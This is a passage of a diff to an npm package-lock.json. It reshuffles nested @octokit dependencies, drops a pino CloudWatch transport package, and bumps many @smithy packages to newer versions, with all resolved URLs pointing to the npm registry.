"sha512-v9iyEQJH6ZntoENr9/yXxjuezh4My67CBSu9r6Ve/05Iu5gNgnisNWOsoJHTP6k0Rr0+HQIpnH+kyammu90q/g==", + "node_modules/@octokit/request/node_modules/@octokit/endpoint": { + "version": "9.0.6", + "resolved": "https://registry.npmjs.org/@octokit/endpoint/-/endpoint-9.0.6.tgz", + "integrity": "sha512-H1fNTMA57HbkFESSt3Y9+FBICv+0jFceJFPWDePYlR/iMGrwM5ph+Dd4XRQs+8X+PUFURLQgX9ChPfhJ/1uNQw==", "license": "MIT", "dependencies": { "@octokit/types": "^13.1.0", - "deprecation": "^2.0.0", - "once": "^1.4.0" + "universal-user-agent": "^6.0.0" }, "engines": { "node": ">= 18" } }, - "node_modules/@octokit/request-error/node_modules/@octokit/openapi-types": { + "node_modules/@octokit/request/node_modules/@octokit/openapi-types": { "version": "24.2.0", "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-24.2.0.tgz", "integrity": "sha512-9sIH3nSUttelJSXUrmGzl7QUBFul0/mB8HRYl3fOlgHbIWG+WnYDXU3v/2zMtAvuzZ/ed00Ei6on975FhBfzrg==", "license": "MIT" }, - "node_modules/@octokit/request-error/node_modules/@octokit/types": { - "version": "13.10.0", - "resolved": "https://registry.npmjs.org/@octokit/types/-/types-13.10.0.tgz", - "integrity": "sha512-ifLaO34EbbPj0Xgro4G5lP5asESjwHracYJvVaPIyXMuiuXLlhic3S47cBdTb+jfODkTE5YtGCLt3Ay3+J97sA==", - "license": "MIT", - "dependencies": { - "@octokit/openapi-types": "^24.2.0" - } - }, - "node_modules/@octokit/request/node_modules/@octokit/endpoint": { - "version": "9.0.6", - "resolved": "https://registry.npmjs.org/@octokit/endpoint/-/endpoint-9.0.6.tgz", - "integrity": "sha512-H1fNTMA57HbkFESSt3Y9+FBICv+0jFceJFPWDePYlR/iMGrwM5ph+Dd4XRQs+8X+PUFURLQgX9ChPfhJ/1uNQw==", + "node_modules/@octokit/request/node_modules/@octokit/request-error": { + "version": "5.1.1", + "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-5.1.1.tgz", + "integrity": "sha512-v9iyEQJH6ZntoENr9/yXxjuezh4My67CBSu9r6Ve/05Iu5gNgnisNWOsoJHTP6k0Rr0+HQIpnH+kyammu90q/g==", "license": "MIT", "dependencies": { "@octokit/types": "^13.1.0", - "universal-user-agent": "^6.0.0" + "deprecation": "^2.0.0", + "once": "^1.4.0" }, "engines": { "node": ">= 18" } }, - "node_modules/@octokit/request/node_modules/@octokit/openapi-types": { - "version": "24.2.0", - "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-24.2.0.tgz", - "integrity": "sha512-9sIH3nSUttelJSXUrmGzl7QUBFul0/mB8HRYl3fOlgHbIWG+WnYDXU3v/2zMtAvuzZ/ed00Ei6on975FhBfzrg==", - "license": "MIT" - }, "node_modules/@octokit/request/node_modules/@octokit/types": { "version": "13.10.0", "resolved": "https://registry.npmjs.org/@octokit/types/-/types-13.10.0.tgz", @@ -8372,6 +8409,35 @@ "resolved": "https://registry.npmjs.org/@octokit/webhooks-types/-/webhooks-types-7.3.1.tgz", "integrity": "sha512-u6355ZsZnHwmxen30SrqnYb1pXieBFkYgkNzt+Ed4Ao5tupN1OErHfzwiV6hq6duGkDAYASbq7/uVJQ69PjLEg==" }, + "node_modules/@octokit/webhooks/node_modules/@octokit/openapi-types": { + "version": "24.2.0", + "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-24.2.0.tgz", + "integrity": "sha512-9sIH3nSUttelJSXUrmGzl7QUBFul0/mB8HRYl3fOlgHbIWG+WnYDXU3v/2zMtAvuzZ/ed00Ei6on975FhBfzrg==", + "license": "MIT" + }, + "node_modules/@octokit/webhooks/node_modules/@octokit/request-error": { + "version": "5.1.1", + "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-5.1.1.tgz", + "integrity": "sha512-v9iyEQJH6ZntoENr9/yXxjuezh4My67CBSu9r6Ve/05Iu5gNgnisNWOsoJHTP6k0Rr0+HQIpnH+kyammu90q/g==", + "license": "MIT", + "dependencies": { + "@octokit/types": "^13.1.0", + "deprecation": "^2.0.0", + "once": "^1.4.0" + }, + "engines": { + "node": ">= 18" + } + }, + "node_modules/@octokit/webhooks/node_modules/@octokit/types": { + "version": "13.10.0", + "resolved": "https://registry.npmjs.org/@octokit/types/-/types-13.10.0.tgz", + "integrity": "sha512-ifLaO34EbbPj0Xgro4G5lP5asESjwHracYJvVaPIyXMuiuXLlhic3S47cBdTb+jfODkTE5YtGCLt3Ay3+J97sA==", + "license": "MIT", + "dependencies": { + "@octokit/openapi-types": "^24.2.0" + } + }, "node_modules/@octokit/webhooks/node_modules/@octokit/webhooks-types": { "version": "7.1.0", "resolved": "https://registry.npmjs.org/@octokit/webhooks-types/-/webhooks-types-7.1.0.tgz", @@ -10330,28 +10396,6 @@ "node": ">=8" } }, - "node_modules/@serdnam/pino-cloudwatch-transport": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/@serdnam/pino-cloudwatch-transport/-/pino-cloudwatch-transport-1.0.4.tgz", - "integrity": "sha512-0wtILlFlO/qTFANM1oEMZLKa9REo+mluHN0VTDaOMh15H9Puc+qU4z4jAoZqggFz9Fw9EGG4c+UHpMduZ1EzeQ==", - "dependencies": { - "@aws-sdk/client-cloudwatch-logs": "^3.52.0", - "p-throttle": "^5.0.0", - "pino-abstract-transport": "^0.5.0" - }, - "engines": { - "node": ">=16.0.0" - } - }, - "node_modules/@serdnam/pino-cloudwatch-transport/node_modules/pino-abstract-transport": { - "version": "0.5.0", - "resolved": "https://registry.npmjs.org/pino-abstract-transport/-/pino-abstract-transport-0.5.0.tgz", - "integrity": "sha512-+KAgmVeqXYbTtU2FScx1XS3kNyfZ5TrXY07V96QnUSFqo2gAqlvmaxH67Lj7SWazqsMabf+58ctdTcBgnOLUOQ==", - "dependencies": { - "duplexify": "^4.1.2", - "split2": "^4.0.0" - } - }, "node_modules/@simplewebauthn/server": { "version": "13.2.2", "resolved": "https://registry.npmjs.org/@simplewebauthn/server/-/server-13.2.2.tgz", @@ -10500,16 +10544,16 @@ } }, "node_modules/@smithy/config-resolver": { - "version": "4.4.13", - "resolved": "https://registry.npmjs.org/@smithy/config-resolver/-/config-resolver-4.4.13.tgz", - "integrity": "sha512-iIzMC5NmOUP6WL6o8iPBjFhUhBZ9pPjpUpQYWMUFQqKyXXzOftbfK8zcQCz/jFV1Psmf05BK5ypx4K2r4Tnwdg==", + "version": "4.4.17", + "resolved": "https://registry.npmjs.org/@smithy/config-resolver/-/config-resolver-4.4.17.tgz", + "integrity": "sha512-TzDZcAnhTyAHbXVxWZo7/tEcrIeFq20IBk8So3OLOetWpR8EwY/yEqBMBFaJMeyEiREDq4NfEl+qO3OAUD+vbQ==", "license": "Apache-2.0", "dependencies": { - "@smithy/node-config-provider": "^4.3.12", - "@smithy/types": "^4.13.1", + "@smithy/node-config-provider": "^4.3.14", + "@smithy/types": "^4.14.1", "@smithy/util-config-provider": "^4.2.2", - "@smithy/util-endpoints": "^3.3.3", - "@smithy/util-middleware": "^4.2.12", + "@smithy/util-endpoints": "^3.4.2", + "@smithy/util-middleware": "^4.2.14", "tslib": "^2.6.2" }, "engines": { @@ -10517,18 +10561,18 @@ } }, "node_modules/@smithy/core": { - "version": "3.23.13", - "resolved": "https://registry.npmjs.org/@smithy/core/-/core-3.23.13.tgz", - "integrity": "sha512-J+2TT9D6oGsUVXVEMvz8h2EmdVnkBiy2auCie4aSJMvKlzUtO5hqjEzXhoCUkIMo7gAYjbQcN0g/MMSXEhDs1Q==", + "version": "3.23.17", + "resolved": "https://registry.npmjs.org/@smithy/core/-/core-3.23.17.tgz", + "integrity": "sha512-x7BlLbUFL8NWCGjMF9C+1N5cVCxcPa7g6Tv9B4A2luWx3be3oU8hQ96wIwxe/s7OhIzvoJH73HAUSg5JXVlEtQ==", "license": "Apache-2.0", "dependencies": { - "@smithy/protocol-http": "^5.3.12", - "@smithy/types": "^4.13.1", - "@smithy/url-parser": "^4.2.12", + "@smithy/protocol-http": "^5.3.14", + "@smithy/types": "^4.14.1", + "@smithy/url-parser": "^4.2.14", "@smithy/util-base64": "^4.3.2", "@smithy/util-body-length-browser": "^4.2.2", - "@smithy/util-middleware": "^4.2.12", - "@smithy/util-stream": "^4.5.21", + "@smithy/util-middleware": "^4.2.14", + "@smithy/util-stream": "^4.5.25", "@smithy/util-utf8": "^4.2.2", "@smithy/uuid": "^1.1.2", "tslib": "^2.6.2" @@ -10538,15 +10582,15 @@ } }, "node_modules/@smithy/credential-provider-imds": { - "version": "4.2.12", - "resolved": "https://registry.npmjs.org/@smithy/credential-provider-imds/-/credential-provider-imds-4.2.12.tgz", - "integrity": "sha512-cr2lR792vNZcYMriSIj+Um3x9KWrjcu98kn234xA6reOAFMmbRpQMOv8KPgEmLLtx3eldU6c5wALKFqNOhugmg==", + "version": "4.2.14", + "resolved": "https://registry.npmjs.org/@smithy/credential-provider-imds/-/credential-provider-imds-4.2.14.tgz", + "integrity": "sha512-Au28zBN48ZAoXdooGUHemuVBrkE+Ie6RPmGNIAJsFqj33Vhb6xAgRifUydZ2aY+M+KaMAETAlKk5NC5h1G7wpg==", "license": "Apache-2.0", "dependencies": { - "@smithy/node-config-provider": "^4.3.12", - "@smithy/property-provider": "^4.2.12", - "@smithy/types": "^4.13.1", - "@smithy/url-parser": "^4.2.12", + "@smithy/node-config-provider": "^4.3.14", + "@smithy/property-provider": "^4.2.14", + "@smithy/types": "^4.14.1", + "@smithy/url-parser": "^4.2.14", "tslib": "^2.6.2" }, "engines": { @@ -10624,14 +10668,14 @@ } }, "node_modules/@smithy/fetch-http-handler": { - "version": "5.3.15", - "resolved": "https://registry.npmjs.org/@smithy/fetch-http-handler/-/fetch-http-handler-5.3.15.tgz", - "integrity": "sha512-T4jFU5N/yiIfrtrsb9uOQn7RdELdM/7HbyLNr6uO/mpkj1ctiVs7CihVr51w4LyQlXWDpXFn4BElf1WmQvZu/A==", + "version": "5.3.17", + "resolved": "https://registry.npmjs.org/@smithy/fetch-http-handler/-/fetch-http-handler-5.3.17.tgz", + "integrity": "sha512-bXOvQzaSm6MnmLaWA1elgfQcAtN4UP3vXqV97bHuoOrHQOJiLT3ds6o9eo5bqd0TJfRFpzdGnDQdW3FACiAVdw==", "license": "Apache-2.0", "dependencies": { - "@smithy/protocol-http": "^5.3.12", - "@smithy/querystring-builder": "^4.2.12", - "@smithy/types": "^4.13.1", + "@smithy/protocol-http": "^5.3.14", + "@smithy/querystring-builder": "^4.2.14", + "@smithy/types": "^4.14.1", "@smithy/util-base64": "^4.3.2", "tslib": "^2.6.2" }, @@ -10655,12 +10699,12 @@ } }, "node_modules/@smithy/hash-node": { - "version": "4.2.12", - "resolved": "https://registry.npmjs.org/@smithy/hash-node/-/hash-node-4.2.12.tgz", - "integrity": "sha512-QhBYbGrbxTkZ43QoTPrK72DoYviDeg6YKDrHTMJbbC+A0sml3kSjzFtXP7BtbyJnXojLfTQldGdUR0RGD8dA3w==", + "version": "4.2.14", + "resolved": "https://registry.npmjs.org/@smithy/hash-node/-/hash-node-4.2.14.tgz", + "integrity": "sha512-8ZBDY2DD4wr+GGjTpPtiglEsqr0lUP+KHqgZcWczFf6qeZ/YRjMIOoQWVQlmwu7EtxKTd8YXD8lblmYcpBIA1g==", "license": "Apache-2.0", "dependencies": { - "@smithy/types": "^4.13.1", + "@smithy/types": "^4.14.1", "@smithy/util-buffer-from": "^4.2.2", "@smithy/util-utf8": "^4.2.2", "tslib": "^2.6.2" @@ -10684,12 +10728,12 @@ } }, "node_modules/@smithy/invalid-dependency": { - "version": "4.2.12", - "resolved": "https://registry.npmjs.org/@smithy/invalid-dependency/-/invalid-dependency-4.2.12.tgz", - "integrity": "sha512-/4F1zb7Z8LOu1PalTdESFHR0RbPwHd3FcaG1sI3UEIriQTWakysgJr65lc1jj6QY5ye7aFsisajotH6UhWfm/g==", + "version": "4.2.14", + "resolved": "https://registry.npmjs.org/@smithy/invalid-dependency/-/invalid-dependency-4.2.14.tgz", + "integrity": "sha512-c21qJiTSb25xvvOp+H2TNZzPCngrvl5vIPqPB8zQ/DmJF4QWXO19x1dWfMJZ6wZuuWUPPm0gV8C0cU3+ifcWuw==", "license": "Apache-2.0", "dependencies": { - "@smithy/types": "^4.13.1", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -10723,13 +10767,13 @@ } }, "node_modules/@smithy/middleware-content-length": { - "version": "4.2.12", - "resolved": "https://registry.npmjs.org/@smithy/middleware-content-length/-/middleware-content-length-4.2.12.tgz", - "integrity": "sha512-YE58Yz+cvFInWI/wOTrB+DbvUVz/pLn5mC5MvOV4fdRUc6qGwygyngcucRQjAhiCEbmfLOXX0gntSIcgMvAjmA==", + "version": "4.2.14", + "resolved": "https://registry.npmjs.org/@smithy/middleware-content-length/-/middleware-content-length-4.2.14.tgz", + "integrity": "sha512-xhHq7fX4/3lv5NHxLUk3OeEvl0xZ+Ek3qIbWaCL4f9JwgDZEclPBElljaZCAItdGPQl/kSM4LPMOpy1MYgprpw==", "license": "Apache-2.0", "dependencies": { - "@smithy/protocol-http": "^5.3.12", - "@smithy/types": "^4.13.1", + "@smithy/protocol-http": "^5.3.14", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -10737,18 +10781,18 @@ } }, "node_modules/@smithy/middleware-endpoint": { - "version": "4.4.28", - "resolved": "https://registry.npmjs.org/@smithy/middleware-endpoint/-/middleware-endpoint-4.4.28.tgz", - "integrity": "sha512-p1gfYpi91CHcs5cBq982UlGlDrxoYUX6XdHSo91cQ2KFuz6QloHosO7Jc60pJiVmkWrKOV8kFYlGFFbQ2WUKKQ==", + "version": "4.4.32", + "resolved": "https://registry.npmjs.org/@smithy/middleware-endpoint/-/middleware-endpoint-4.4.32.tgz", + "integrity": "sha512-ZZkgyjnJppiZbIm6Qbx92pbXYi1uzenIvGhBSCDlc7NwuAkiqSgS75j1czAD25ZLs2FjMjYy1q7gyRVWG6JA0Q==", "license": "Apache-2.0", "dependencies": { - "@smithy/core": "^3.23.13", - "@smithy/middleware-serde": "^4.2.16", - "@smithy/node-config-provider": "^4.3.12", - "@smithy/shared-ini-file-loader": "^4.4.7", - "@smithy/types": "^4.13.1", - "@smithy/url-parser": "^4.2.12", - "@smithy/util-middleware": "^4.2.12", + "@smithy/core": "^3.23.17", + "@smithy/middleware-serde": "^4.2.20", + "@smithy/node-config-provider": "^4.3.14", + "@smithy/shared-ini-file-loader": "^4.4.9", + "@smithy/types": "^4.14.1", + "@smithy/url-parser": "^4.2.14", + "@smithy/util-middleware": "^4.2.14", "tslib": "^2.6.2" }, "engines": { @@ -10756,18 +10800,19 @@ } }, "node_modules/@smithy/middleware-retry": { - "version": "4.4.46", - "resolved": "https://registry.npmjs.org/@smithy/middleware-retry/-/middleware-retry-4.4.46.tgz", - "integrity": "sha512-SpvWNNOPOrKQGUqZbEPO+es+FRXMWvIyzUKUOYdDgdlA6BdZj/R58p4umoQ76c2oJC44PiM7mKizyyex1IJzow==", + "version": "4.5.6", + "resolved": "https://registry.npmjs.org/@smithy/middleware-retry/-/middleware-retry-4.5.6.tgz", + "integrity": "sha512-5zhmo2AkstmM/RMKYP0NHfmuYWBR+/umlmSuALgajLxf0X0rLE6d17MfzTxpzkILWVhwvCJkCyPH0AfMlbaucQ==", "license": "Apache-2.0", "dependencies": { - "@smithy/node-config-provider": "^4.3.12", - "@smithy/protocol-http": "^5.3.12", - "@smithy/service-error-classification": "^4.2.12", - "@smithy/smithy-client": "^4.12.8", - "@smithy/types": "^4.13.1", - "@smithy/util-middleware": "^4.2.12", - "@smithy/util-retry": "^4.2.13", + "@smithy/core": "^3.23.17", + "@smithy/node-config-provider": "^4.3.14", + "@smithy/protocol-http": "^5.3.14", + "@smithy/service-error-classification": "^4.3.1", + "@smithy/smithy-client": "^4.12.13", + "@smithy/types": "^4.14.1", + "@smithy/util-middleware": "^4.2.14", + "@smithy/util-retry": "^4.3.5", "@smithy/uuid": "^1.1.2", "tslib": "^2.6.2" }, @@ -10776,14 +10821,14 @@ } }, "node_modules/@smithy/middleware-serde": { - "version": "4.2.16", - "resolved": "https://registry.npmjs.org/@smithy/middleware-serde/-/middleware-serde-4.2.16.tgz", - "integrity": "sha512-beqfV+RZ9RSv+sQqor3xroUUYgRFCGRw6niGstPG8zO9LgTl0B0MCucxjmrH/2WwksQN7UUgI7KNANoZv+KALA==", + "version": "4.2.20", + "resolved": "https://registry.npmjs.org/@smithy/middleware-serde/-/middleware-serde-4.2.20.tgz", + "integrity": "sha512-Lx9JMO9vArPtiChE3wbEZ5akMIDQpWQtlu90lhACQmNOXcGXRbaDywMHDzuDZ2OkZzP+9wQfZi3YJT9F67zTQQ==", "license": "Apache-2.0", "dependencies": { - "@smithy/core": "^3.23.13", - "@smithy/protocol-http": "^5.3.12", - "@smithy/types": "^4.13.1", + "@smithy/core": "^3.23.17", + "@smithy/protocol-http": "^5.3.14", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -10791,12 +10836,12 @@ } }, "node_modules/@smithy/middleware-stack": { - "version": "4.2.12", - "resolved": "https://registry.npmjs.org/@smithy/middleware-stack/-/middleware-stack-4.2.12.tgz", - "integrity": "sha512-kruC5gRHwsCOuyCd4ouQxYjgRAym2uDlCvQ5acuMtRrcdfg7mFBg6blaxcJ09STpt3ziEkis6bhg1uwrWU7txw==", + "version": "4.2.14", + "resolved": "https://registry.npmjs.org/@smithy/middleware-stack/-/middleware-stack-4.2.14.tgz", + "integrity": "sha512-2dvkUKLuFdKsCRmOE4Mn63co0Djtsm+JMh0bYZQupN1pJwMeE8FmQmRLLzzEMN0dnNi7CDCYYH8F0EVwWiPBeA==", "license": "Apache-2.0", "dependencies": { - "@smithy/types": "^4.13.1", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -10804,14 +10849,14 @@ } }, "node_modules/@smithy/node-config-provider": { - "version": "4.3.12", - "resolved": "https://registry.npmjs.org/@smithy/node-config-provider/-/node-config-provider-4.3.12.tgz", - "integrity": "sha512-tr2oKX2xMcO+rBOjobSwVAkV05SIfUKz8iI53rzxEmgW3GOOPOv0UioSDk+J8OpRQnpnhsO3Af6IEBabQBVmiw==", + "version": "4.3.14", + "resolved": "https://registry.npmjs.org/@smithy/node-config-provider/-/node-config-provider-4.3.14.tgz", + "integrity": "sha512-S+gFjyo/weSVL0P1b9Ts8C/CwIfNCgUPikk3sl6QVsfE/uUuO+QsF+NsE/JkpvWqqyz1wg7HFdiaZuj5CoBMRg==", "license": "Apache-2.0", "dependencies": { - "@smithy/property-provider": "^4.2.12", - "@smithy/shared-ini-file-loader": "^4.4.7", - "@smithy/types": "^4.13.1", + "@smithy/property-provider": "^4.2.14", + "@smithy/shared-ini-file-loader": "^4.4.9", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -10819,14 +10864,14 @@ } }, "node_modules/@smithy/node-http-handler": { - "version": "4.5.1", - "resolved": "https://registry.npmjs.org/@smithy/node-http-handler/-/node-http-handler-4.5.1.tgz", - "integrity": "sha512-ejjxdAXjkPIs9lyYyVutOGNOraqUE9v/NjGMKwwFrfOM354wfSD8lmlj8hVwUzQmlLLF4+udhfCX9Exnbmvfzw==", + "version": "4.6.1", + "resolved": "https://registry.npmjs.org/@smithy/node-http-handler/-/node-http-handler-4.6.1.tgz", + "integrity": "sha512-iB+orM4x3xrr57X3YaXazfKnntl0LHlZB1kcXSGzMV1Tt0+YwEjGlbjk/44qEGtBzXAz6yFDzkYTKSV6Pj2HUg==", "license": "Apache-2.0", "dependencies": { - "@smithy/protocol-http": "^5.3.12", - "@smithy/querystring-builder": "^4.2.12", - "@smithy/types": "^4.13.1", + "@smithy/protocol-http": "^5.3.14", + "@smithy/querystring-builder": "^4.2.14", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -10834,12 +10879,12 @@ } }, "node_modules/@smithy/property-provider": { - "version": "4.2.12", - "resolved": "https://registry.npmjs.org/@smithy/property-provider/-/property-provider-4.2.12.tgz", - "integrity": "sha512-jqve46eYU1v7pZ5BM+fmkbq3DerkSluPr5EhvOcHxygxzD05ByDRppRwRPPpFrsFo5yDtCYLKu+kreHKVrvc7A==", + "version": "4.2.14", + "resolved": "https://registry.npmjs.org/@smithy/property-provider/-/property-provider-4.2.14.tgz", + "integrity": "sha512-WuM31CgfsnQ/10i7NYr0PyxqknD72Y5uMfUMVSniPjbEPceiTErb4eIqJQ+pdxNEAUEWrewrGjIRjVbVHsxZiQ==", "license": "Apache-2.0", "dependencies": { - "@smithy/types": "^4.13.1", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -10847,12 +10892,12 @@ } }, "node_modules/@smithy/protocol-http": { - "version": "5.3.12", - "resolved": "https://registry.npmjs.org/@smithy/protocol-http/-/protocol-http-5.3.12.tgz", - "integrity": "sha512-fit0GZK9I1xoRlR4jXmbLhoN0OdEpa96ul8M65XdmXnxXkuMxM0Y8HDT0Fh0Xb4I85MBvBClOzgSrV1X2s1Hxw==", + "version": "5.3.14", + "resolved": "https://registry.npmjs.org/@smithy/protocol-http/-/protocol-http-5.3.14.tgz", + "integrity": "sha512-dN5F8kHx8RNU0r+pCwNmFZyz6ChjMkzShy/zup6MtkRmmix4vZzJdW+di7x//b1LiynIev88FM18ie+wwPcQtQ==", "license": "Apache-2.0", "dependencies": { - "@smithy/types": "^4.13.1", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -10860,12 +10905,12 @@ } }, "node_modules/@smithy/querystring-builder": { - "version": "4.2.12", - "resolved": "https://registry.npmjs.org/@smithy/querystring-builder/-/querystring-builder-4.2.12.tgz", - "integrity": "sha512-6wTZjGABQufekycfDGMEB84BgtdOE/rCVTov+EDXQ8NHKTUNIp/j27IliwP7tjIU9LR+sSzyGBOXjeEtVgzCHg==", + "version": "4.2.14", + "resolved": "https://registry.npmjs.org/@smithy/querystring-builder/-/querystring-builder-4.2.14.tgz", + "integrity": "sha512-XYA5Z0IqTeF+5XDdh4BBmSA0HvbgVZIyv4cmOoUheDNR57K1HgBp9ukUMx3Cr3XpDHHpLBnexPE3LAtDsZkj2A==", "license": "Apache-2.0", "dependencies": { - "@smithy/types": "^4.13.1", + "@smithy/types": "^4.14.1", "@smithy/util-uri-escape": "^4.2.2", "tslib": "^2.6.2" }, @@ -10874,12 +10919,12 @@ } }, "node_modules/@smithy/querystring-parser": { - "version": "4.2.12", - "resolved": "https://registry.npmjs.org/@smithy/querystring-parser/-/querystring-parser-4.2.12.tgz", - "integrity": "sha512-P2OdvrgiAKpkPNKlKUtWbNZKB1XjPxM086NeVhK+W+wI46pIKdWBe5QyXvhUm3MEcyS/rkLvY8rZzyUdmyDZBw==", + "version": "4.2.14", + "resolved": "https://registry.npmjs.org/@smithy/querystring-parser/-/querystring-parser-4.2.14.tgz", + "integrity": "sha512-hr+YyqBD23GVvRxGGrcc/oOeNlK3PzT5Fu4dzrDXxzS1LpFiuL2PQQqKPs87M79aW7ziMs+nvB3qdw77SqE7Lw==", "license": "Apache-2.0", "dependencies": { - "@smithy/types": "^4.13.1", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -10887,24 +10932,24 @@ } }, "node_modules/@smithy/service-error-classification": { - "version": "4.2.12", - "resolved": "https://registry.npmjs.org/@smithy/service-error-classification/-/service-error-classification-4.2.12.tgz", - "integrity": "sha512-LlP29oSQN0Tw0b6D0Xo6BIikBswuIiGYbRACy5ujw/JgWSzTdYj46U83ssf6Ux0GyNJVivs2uReU8pt7Eu9okQ==", + "version": "4.3.1", + "resolved": "https://registry.npmjs.org/@smithy/service-error-classification/-/service-error-classification-4.3.1.tgz", + "integrity": "sha512-aUQuDGh760ts/8MU+APjIZhlLPKhIIfqyzZaJikLEIMrdxFvxuLYD0WxWzaYWpmLbQlXDe9p7EWM3HsBe0K6Gw==", "license": "Apache-2.0", "dependencies": { - "@smithy/types": "^4.13.1" + "@smithy/types": "^4.14.1" }, "engines": { "node": ">=18.0.0" } }, "node_modules/@smithy/shared-ini-file-loader": { - "version": "4.4.7", - "resolved": "https://registry.npmjs.org/@smithy/shared-ini-file-loader/-/shared-ini-file-loader-4.4.7.tgz", - "integrity": "sha512-HrOKWsUb+otTeo1HxVWeEb99t5ER1XrBi/xka2Wv6NVmTbuCUC1dvlrksdvxFtODLBjsC+PHK+fuy2x/7Ynyiw==", + "version": "4.4.9", + "resolved": "https://registry.npmjs.org/@smithy/shared-ini-file-loader/-/shared-ini-file-loader-4.4.9.tgz", + "integrity": "sha512-495/V2I15SHgedSJoDPD23JuSfKAp726ZI1V0wtjB07Wh7q/0tri/0e0DLefZCHgxZonrGKt/OCTpAtP1wE1kQ==", "license": "Apache-2.0", "dependencies": { - "@smithy/types": "^4.13.1", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -10912,16 +10957,16 @@ } }, "node_modules/@smithy/signature-v4": { - "version": "5.3.12", - "resolved": "https://registry.npmjs.org/@smithy/signature-v4/-/signature-v4-5.3.12.tgz", - "integrity": "sha512-B/FBwO3MVOL00DaRSXfXfa/TRXRheagt/q5A2NM13u7q+sHS59EOVGQNfG7DkmVtdQm5m3vOosoKAXSqn/OEgw==", + "version": "5.3.14", + "resolved": "https://registry.npmjs.org/@smithy/signature-v4/-/signature-v4-5.3.14.tgz", + "integrity": "sha512-1D9Y/nmlVjCeSivCbhZ7hgEpmHyY1h0GvpSZt3l0xcD9JjmjVC1CHOozS6+Gh+/ldMH8JuJ6cujObQqfayAVFA==", "license": "Apache-2.0", "dependencies": { "@smithy/is-array-buffer": "^4.2.2", - "@smithy/protocol-http": "^5.3.12", - "@smithy/types": "^4.13.1", + "@smithy/protocol-http": "^5.3.14", + "@smithy/types": "^4.14.1", "@smithy/util-hex-encoding": "^4.2.2", - "@smithy/util-middleware": "^4.2.12", + "@smithy/util-middleware": "^4.2.14", "@smithy/util-uri-escape": "^4.2.2", "@smithy/util-utf8": "^4.2.2", "tslib": "^2.6.2" @@ -10931,17 +10976,17 @@ } }, "node_modules/@smithy/smithy-client": { - "version": "4.12.8", - "resolved": "https://registry.npmjs.org/@smithy/smithy-client/-/smithy-client-4.12.8.tgz", - "integrity": "sha512-aJaAX7vHe5i66smoSSID7t4rKY08PbD8EBU7DOloixvhOozfYWdcSYE4l6/tjkZ0vBZhGjheWzB2mh31sLgCMA==", + "version": "4.12.13", + "resolved": "https://registry.npmjs.org/@smithy/smithy-client/-/smithy-client-4.12.13.tgz", + "integrity": "sha512-y/Pcj1V9+qG98gyu1gvftHB7rDpdh+7kIBIggs55yGm3JdtBV8GT8IFF3a1qxZ79QnaJHX9GXzvBG6tAd+czJA==", "license": "Apache-2.0", "dependencies": { - "@smithy/core": "^3.23.13", - "@smithy/middleware-endpoint": "^4.4.28", - "@smithy/middleware-stack": "^4.2.12", - "@smithy/protocol-http": "^5.3.12", - "@smithy/types": "^4.13.1", - "@smithy/util-stream": "^4.5.21", + "@smithy/core": "^3.23.17", + "@smithy/middleware-endpoint": "^4.4.32", + "@smithy/middleware-stack": "^4.2.14", + "@smithy/protocol-http": "^5.3.14", + "@smithy/types": "^4.14.1", + "@smithy/util-stream": "^4.5.25", "tslib": "^2.6.2" }, "engines": { @@ -10949,9 +10994,9 @@ } }, "node_modules/@smithy/types": { - "version": "4.13.1", - "resolved": "https://registry.npmjs.org/@smithy/types/-/types-4.13.1.tgz", - "integrity": "sha512-787F3yzE2UiJIQ+wYW1CVg2odHjmaWLGksnKQHUrK/lYZSEcy1msuLVvxaR/sI2/aDe9U+TBuLsXnr3vod1g0g==", + "version": "4.14.1", + "resolved": "https://registry.npmjs.org/@smithy/types/-/types-4.14.1.tgz", + "integrity": "sha512-59b5HtSVrVR/eYNei3BUj3DCPKD/G7EtDDe7OEJE7i7FtQFugYo6MxbotS8mVJkLNVf8gYaAlEBwwtJ9HzhWSg==", "license": "Apache-2.0", "dependencies": { "tslib": "^2.6.2" @@ -10961,13 +11006,13 @@ } }, "node_modules/@smithy/url-parser": { - "version": "4.2.12", - "resolved": "https://registry.npmjs.org/@smithy/url-parser/-/url-parser-4.2.12.tgz", - "integrity": "sha512-wOPKPEpso+doCZGIlr+e1lVI6+9VAKfL4kZWFgzVgGWY2hZxshNKod4l2LXS3PRC9otH/JRSjtEHqQ/7eLciRA==", + "version": "4.2.14", + "resolved": "https://registry.npmjs.org/@smithy/url-parser/-/url-parser-4.2.14.tgz", + "integrity": "sha512-p06BiBigJ8bTA3MgnOfCtDUWnAMY0YfedO/GRpmc7p+wg3KW8vbXy1xwSu5ASy0wV7rRYtlfZOIKH4XqfhjSQQ==", "license": "Apache-2.0", "dependencies": { - "@smithy/querystring-parser": "^4.2.12", - "@smithy/types": "^4.13.1", + "@smithy/querystring-parser": "^4.2.14", + "@smithy/types": "^4.14.1", "tslib": "^2.6.2" }, "engines": { @@ -11038,14 +11083,14 @@ } }, "node_modules/@smithy/util-defaults-mode-browser": { - "version": "4.3.44", - "resolved": "https://registry.npmjs.org/@smithy/util-defaults-mode-browser/-/util-defaults-mode-browser-4.3.44.tgz", - "integrity": "sha512-eZg6XzaCbVr2S5cAErU5eGBDaOVTuTo1I65i4tQcHENRcZ8rMWhQy1DaIYUSLyZjsfXvmCqZrstSMYyGFocvHA==", + "version": "4.3.49", + "resolved": "https://registry.npmjs.org/@smithy/util-defaults-mode-browser/-/util-defaults-mode-browser-4.3.49.tgz", + "integrity": 